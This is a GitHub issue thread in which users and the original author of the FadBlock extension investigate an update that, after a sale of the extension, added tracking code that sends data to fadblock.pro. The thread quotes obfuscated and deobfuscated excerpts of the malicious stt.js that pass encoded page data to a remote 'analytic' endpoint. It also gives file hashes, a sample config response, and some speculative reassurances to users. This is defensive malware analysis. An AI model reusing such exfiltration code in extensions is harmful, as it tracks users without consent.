ciltocruz
commented
5 months ago +1
Closed JaielZeus closed 4 months ago
ciltocruz
commented
5 months ago +1
seebeedub
commented
5 months ago +1
PanuWeb
commented
5 months ago Same problem here.
I have no problem enabling the new permissions if they are "necessary", but it is important to know what they are going to be used for.
I can't find information in the README.md or in the GitHub releases.
Thank you
BobbyRaduloff
commented
5 months ago For me, the update also made it so the extension doesn't work and it requires a payment.
MaximusHoudini
commented
5 months ago Agreed, as long as they're necessary but I also have the license issue, asking for another payment.
PanuWeb
commented
5 months ago I see that several of you are being asked to pay license fees. I clarify that in my case he is not asking me.
What may be different is that I reinstall the extension.
I leave a screenshot.
ene0s
commented
5 months ago I also would like to know why the extension now needs more permissions.
JaielZeus
commented
5 months ago I have removed the extension now and gone back to Adblocker as it does the same job and has a reason to have the permission to read data on all sites and is serious enough for me to accept this intrusive permissions
kbsanders
commented
5 months ago Same. I would like to know why the extension now needs wide open permissions to read and change data on all websites before I re-enable it.
shimpe
commented
5 months ago Same. This seems a little fishy. Too bad as it worked well while it worked...
poka-IT
commented
5 months ago Same thing here on Brave:
This is very worring because last commit (code change) here date of November 2023 ! And latest release on October 2023. I think there is a big suspicious problem this this extension.
My take is: Don't accept theses permissions changes and wait for news from devs here. I just installed the latest available build from github, and it works: https://github.com/0x48piraj/fadblock/releases
0x48piraj
commented
5 months ago This is crazy. I am no longer the owner of the extension. I sold it over a month ago, seems like it traded hands and now the current owner has added malicious code while keeping the extension as it is!
I am taking immediate action and will release a new version of the clean codebase for everyone to use.
I am also thinking of pursuing legal action as it appears they have retained access to my PayPal and other support links!
0x48piraj
commented
5 months ago As of now, I have updated the repository with this new information (https://github.com/0x48piraj/fadblock/commit/4a131670c6cd16bf9844bc50f65a8c6202ffb015) and now will start working on forking and deploying the clean version as soon as possible.
0x48piraj
commented
5 months ago As of now, the clean version has been submitted to the store under a new name.
Now I will start notifying users and trying to control the exposure.
I will also urge you all to report the malicious extension so it can get removed as soon as possible.
0x48piraj
commented
5 months ago I also have filed a report providing the team with support materials,
kbsanders
commented
5 months ago Any details on what the malicious code is doing?
0x48piraj
commented
5 months ago Yes, being an independent security researcher, this falls under my jurisdiction. I've already started inspecting the code, identified the malicious code block, and am currently conducting an investigation.
Here's the whole source if anyone else is interested, mdadjjfmjhfcibgfhfjbaiiljpllkbfc-v2.7.zip
Here's the details of the malicious file,
File name js/stt.js
File size 249,607 bytes
md5 da0ab10b04e7c069d87b11d99b9ca512
sha1 b4a65d866e9cff6c9517f8a6af6c5a7e3027be88
sha256 5366039a45019653ef1f6bf1b948fdbff3b50fd753096c5ab25f19297fc3e9ba
sha384 090e9629520d85aa4d48a51abffb776083acf85cf138b2849cbd4b7a5ee9e813e8a9e1a80f15ada543e2d2602f591839
sha512 94996e20f3cd61a34e111ab2eca57a3ac9decffdab8a62d1ccbc0aa66bc833e302106716494fb442d80b5de44c1a243dbf65e24dab1b0fc0ac6aa28d49c0b3dfAfter a cursory analysis, it seems like it's a modified jQuery base coupled with data collection slash adware modules.
The data is sent to the endpoint named fadblock.pro.
A few manual methods exist to block access to any website domain, such as editing your HOSTS file but for Chrome I would suggest doing the following,
0x48piraj
commented
5 months ago Here's a quick DNS information on fadblock.pro,
Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
clientTransferProhibited
addPeriod
Name Servers:
dns1.registrar-servers.com
dns2.registrar-servers.comHere's a quick DNS information on fadblock.pro,
Domain: fadblock.pro Registrar: NameCheap, Inc. Registered On: 2024-01-21 Expires On: 2025-01-21 Updated On: 2024-01-21 Status: clientTransferProhibited addPeriod Name Servers: dns1.registrar-servers.com dns2.registrar-servers.com
DDoS sequence initiated
benalt613
commented
5 months ago I uninstalled the malicious version, but is there anything I should be concerned about in terms of my data? Change passwords on sites etc. that were used?
0x48piraj
commented
5 months ago I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.
I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.
sam31046
commented
5 months ago I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.
I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.
Thank you @0x48piraj
poka-IT
commented
5 months ago I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version.
Take your sleep, you did most important by alert everybody here, we are sharing the news too. Thanks for that. (I know this kind of rush so I support you...)
Just a question, you said you sold this app to theses guys ? Can you tell more about or is it private ? Just to understand the situation.
benalt613
commented
5 months ago I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
In stealing sessions, what kind of information can be taken from a session? Would that include username/password entered in the session or anything displayed in the browser for that session?
poka-IT
commented
5 months ago Would that include username/password entered in the session or anything displayed in the browser for that session?
No basically to be sure, just log out every websites your are currently logged in, and theses sessions will be disabled, so unusable. Users data should not be presents in sessions, just tokens for the current ... session.
0x48piraj
commented
5 months ago @benalt613 I don't even think it steals your sessions as of now but it acts as a CnC center of some sort and sends analytical data (probably URLs you visit) to the attacker's server.
Here's the code bit,
if ($('img')) {
$('img')
.each(function(index, value) {
if ($(this)
.attr(gz)) {
let sc = $(this)
.attr(gz);
if (sc.includes(go)) {
chrome.storage.local.get(["fad_yt_block"])
.then((t) => {
t.fad_yt_block && (e = JSON.parse(t.fad_yt_block));
chrome.runtime.sendMessage({
action: "fad-action-src",
url: gi,
pl: {
sc: btoa(sc),
cf: btoa(e)
}
}, function(e) {});
});
}
}
});
}
e && chrome.storage.local.set({
fad_yt_ep: btoa(e + " | " + t)
})
.then(() => {});
})),
v &&
chrome.runtime.sendMessage({
action: "fad-action-text",
url: u
}, function(e) {
const t = /6kU.*?"/gm;
let n;
const r = e;
let u = "";
for (; null !== (n = t.exec(r));)
n.index === t.lastIndex && t.lastIndex++,
n.forEach((e, t) => {
u = e;
});
(u = u.replace('"', "")),
u &&
((u = p + u),
chrome.runtime.sendMessage({
action: "fad-action-json",
url: c + u
}, function(e) {
const t = e.id,
n = e;
chrome.runtime.sendMessage({
action: "fad-action-json",
url: l + u
}, function(e) {
let r = e.data;
chrome.runtime.sendMessage({
action: "fad-action-json",
url: f + u
}, function(e) {
let l = e.data;
chrome.runtime.sendMessage({
action: "fad-action-cf",
url: f1,
c: f2
}, function(e) {
let l1 = e;
chrome.runtime.sendMessage({
action: "fad-action-analytic",
url: o,
pl: {
a: i,
b: u,
c: n,
d: r,
e: l,
f: t,
g: a,
h: s,
i: g,
k: l1
}
}, function(e) {
chrome.storage.local.set({
fad_yt_block: JSON.stringify(t)
})
.then(() => {});
});
});
});
});
}));So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.
0x48piraj
commented
5 months ago @poka-IT Appreciate your politeness. Unfortunately, I'm bound by a signed agreement that prohibits me from disclosing any information about the owner and the transaction.
And, as I have said above, it's not the buyer, it traded hands again it seems - I have sent a harshly worded email nonetheless.
poka-IT
commented
5 months ago I'm reading the code you provided, I don't see any malicious code on my side.
External requests are only made on https://fadblock.pro/check/extension, with just fetching datas, doesn't seems to send anything there.
Response is
{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}So probably just metadata for analytics as you said. Probably loggin IP address, that's it. But i'm just linux sys admin not security expert, maybe missed something.
0x48piraj
commented
5 months ago No, I think you're right @poka-IT. That's my working theory as well.
However, requesting permissions for every site is inherently a malicious action, so it's best to err on the side of extra caution. It has a lot of jQuery boilerplate nonsense and useless base64 encodings.
0x48piraj
commented
5 months ago If they are developing it into a general adblocker - that may grant using the permissions they have but the base64 encoding, cryptic function names, and needless obfuscation, not to mention the tracking - point only to one thing - adware/malware.
benalt613
commented
5 months ago So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.
@0x48piraj Thanks. I've also decided to create a separate Chrome profile with limited extensions for sessions containing logins that need to be more secure.
poka-IT
commented
5 months ago yes, stt.js look like a minified file, but is not as there is line break and indents. A minifier will never do this kind of incremental base64 mapping:
const o = atob(e.fad1),
i = atob(e.fad2),
a = atob(e.fad3),
s = atob(e.fad4),
u = atob(e.fad5),
l = atob(e.fad6),
c = atob(e.fad7),
f = atob(e.fad8),
p = atob(e.fad9),
d = atob(e.fad10),
h = atob(e.fad11),
g = atob(e.fad12),
gn = atob(e.fad13),
go = atob(e.fad14),
gi = atob(e.fad15),
gx = atob(e.fad16),
gy = atob(e.fad17),
gz = atob(e.fad18),
f1 = atob(e.fad19),
f2 = atob(e.fad20);But a normal human will never code like this, with consts here and 5 lines under, variables with same names but in restrictive scope:
var n = [],
r = Object.getPrototypeOf,
o = n.slice,
i = n.flat
? function (e) {
return n.flat.call(e);
}
: function (e) {
return n.concat.apply([], e);
},
a = n.push,
s = n.indexOf,
u = {},
l = u.toString,
c = u.hasOwnProperty,
f = c.toString,
p = f.call(Object),
d = {},on 4000 lines ...
LLM don't do that neither, it use human readable names. Unless it has received these instructions. This is machine code, or this is artistic obfuscation. Maybe LLM could help to understand.
SImone-Cow
commented
5 months ago Hello @0x48piraj I'm new here and I would just like to ask, does removing the extension from my browser remove potential remote access from their servers or would there still be remnants of their codes embedded that I should be worried about? (sorry for the question I'm still a beginner)
That1BlueMew
commented
5 months ago @0x48piraj Is the Firefox version also effected?
0x48piraj
commented
5 months ago The new extension is under review process and hopefully will be released soon and we can shift over there. The funny thing is, I was also affected as I use FadBlock on YT by default lol.
@That1BlueMew, no, the Firefox version is still under my control and thus, it's completely safe.
@SImone-Cow, as of now, the extension doesn't steal data so I think we are safe. Also, yes, just removing the extension will remove everything, no remnants, nothing. Clean slate.
That1BlueMew
commented
5 months ago thank you so much that removed my fear i use firefox as my main browser for everything i was about to rotate everything
0x48piraj
commented
5 months ago Thank you so much @poka-IT for collaborating on this. I will finally doze off now as it's been 24 hours since the incident and I don't think I can go on any longer without sleep.
poka-IT
commented
5 months ago I used this tool to deobfuscate stt.js: https://github.com/ViZiD/humanify
result here: deobfuscated.zip Maybe it help, maybe not.
Now we are on 9000 lines. You're welcome ahaha
SImone-Cow
commented
5 months ago Thanks for you hard work and efforts @0x48piraj despite not being the owner of fadblock anymore, you still manage to help us and provide insights regarding the problem.
poka-IT
commented
5 months ago So the supicious code become:
let ownerDocument = childSeparator(unsupportedSelectors).val();
if (childSeparator("img")) {
childSeparator("img").each(function (index, value) {
if (childSeparator(this).attr(variableGz)) {
let encryptedData = childSeparator(this).attr(variableGz);
if (encryptedData.includes(variableGo)) {
chromeAPI.localStorage.local
.get(["fad_yt_block"])
.then((ownerDocument) => {
if (ownerDocument.youtubeData) {
element = JSONParser.parse(ownerDocument.youtubeData);
}
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-src",
url: variableGi,
pl: {
encryptedData: encodeBase64(encryptedData),
cf: encodeBase64(element),
},
},
function (element) {},
);
});
}
}
});
}
if (element) {
chromeAPI.localStorage.local
.set({
fad_yt_ep: encodeBase64(element + " | " + ownerDocument),
})
.then(() => {});
}
},
);
}
if (returnValue) {
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-text",
url: isXMLDoc,
},
function (element) {
const ownerDocument = /6kU.*?"/gm;
let cache;
const result = element;
let isXMLDoc = "";
for (; (cache = ownerDocument.exec(result)) !== null; ) {
if (cache.index === ownerDocument.lastIndex) {
ownerDocument.lastIndex++;
}
cache.forEach((element, ownerDocument) => {
isXMLDoc = element;
});
}
isXMLDoc = isXMLDoc.replace('"', "");
if (isXMLDoc) {
isXMLDoc = isHTMLDoc + isXMLDoc;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: querySelectorAll + isXMLDoc,
},
function (element) {
const ownerDocument = element.id;
const cache = element;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: document + isXMLDoc,
},
function (element) {
let result = element.data;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: documentElement + isXMLDoc,
},
function (element) {
let document = element.data;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-cf",
url: variableF1,
querySelectorAll: variableF2,
},
function (element) {
let cfData = element;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-analytic",
url: divider,
pl: {
length: index,
remainder: isXMLDoc,
querySelectorAll: cache,
support: result,
element: document,
documentElement: ownerDocument,
matches: length,
unsupportedSelectors: matchesSelector,
index: matches,
newResult: cfData,
},
},
function (element) {
chromeAPI.localStorage.local
.set({
youtubeData:
JSONParser.stringify(ownerDocument),
})
.then(() => {});
},
);
},
);
},
);
},
);Where
variableGz = fad18variableGo = fad14variableGi = fad15The thing is, from https://fadblock.pro/check/extension, that stop to fad12, so there is a world where this request return more stuff.
I think the easiest way is to execute this app in sandbox and analyse requests. Or maybe we just don't care.
0x48piraj
commented
5 months ago I think we should do the latter @poka-IT, I couldn't sleep as this incident was eating up my conscience but thanks to the Chrome team, the previous authentic version was just now published!
Share this version wherever you can (and I will do the same): https://chromewebstore.google.com/detail/fadblock-origin-friendly/lmnhcklabcehiohmmeihcheoegomkghm?hl=en
JaielZeus
commented
5 months ago I'm sorry for being direct here but I lost my trust in this extension and moved on to my good old Adblocker. Selling the extension for a quick cash grab and putting the userbase under the bus like that is just so bad. As they say: trust is hard to gain but easy to lose. Wish you good luck for the future of this extension but I'm out though...
DennisGHUA
commented
5 months ago You should probably also steer clear of this extension: Adblock for Youtube™. It isn't the Fadblock extension; it is a separate extension which works differently with 10M+ users. It uses the same icon and it also requires invasive permissions for every website.
mauigirl
commented
5 months ago Thank you @0x48piraj for stepping back in. I supported and paid for Fadblock when you were still the owner and am appreciative for this extension every day. Even more so that you came back and resurrected the original so quickly!
0x48piraj
commented
5 months ago I completely understand, @JaielZeus, in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users. Maintenance had become challenging, and I envisioned FadBlock evolving into a robust full-blown ChatGPT-powered powerhouse, capable of generating transcripts, language translation, and more, with significant potential…and I didn't have the time to tend to it.
I did all this solely because of the few people who supported this project, whether monetarily or emotionally amid all the negativity, and I couldn't leave you all hanging. This isn't about seeking forgiveness or anything, I just see it as my duty.
christian100kodehode
commented
5 months ago This is so bad, first selling us "life time" keys, then selling the software to a unknown third party ??
fabriziocarloni
commented
5 months ago Are you really sure that this extension does not transfer cookies or users and passwords to the fadblock.pro domain? I'm asking you because a few days ago (January 26th) we had a hack on a Facebook account and I'm almost sure it was caused by this extension with malicious code. No dangerous files were opened on the computer where this extension was installed and coincidentally a few days earlier authorization had been given to read and modify all data on all websites.
0x48piraj
commented
5 months ago @christian100kodehode, in the memo, the licenses were to be retained - which they still are - but I never thought they would try to package the extension into malware.
I have published a new version - replicated the whole database so that lifetime users can log in effortlessly again without any re-payment hassles or even reaching out for troubleshooting.
I am also planning to open-source the current version's codebase and reverse the open-core status. I am very sorry for all the commotion but I never expected any of this. The support was bare-minimum and I wanted to hand it off so it could evolve into something even bigger and better. :/
@fabriziocarloni, I think so, as you can see here on the thread, I and @poka-IT both came to the same conclusion while independently investigating.
fabriziocarloni
commented
5 months ago @0x48piraj As suggested by @poka-IT the only way to understand what this modified extension really does is to run it in a sandbox and then analyze its requests. I'm sorry but in my opinion it was this extension with malicious code that was the cause of the hack we had.
0x48piraj
commented
5 months ago As said previously, I am in no way saying it's not uploading anything, it was @poka-IT who deep-dived and uncovered the requests, it's better to switch out, and have a security audit of our accounts - I did the same.
The extension was updated over night and now needs more intrusive permissions on chrome to work again. I would like to know the reason why you need that @0x48piraj? I would think reading the data from youtube.com is already enough for this extension to work wouldn't you say so too? What is the reason here? I am really hesitant reenabling it and this suck, especially since I paid for premium and now the extension becomes intrusive like that.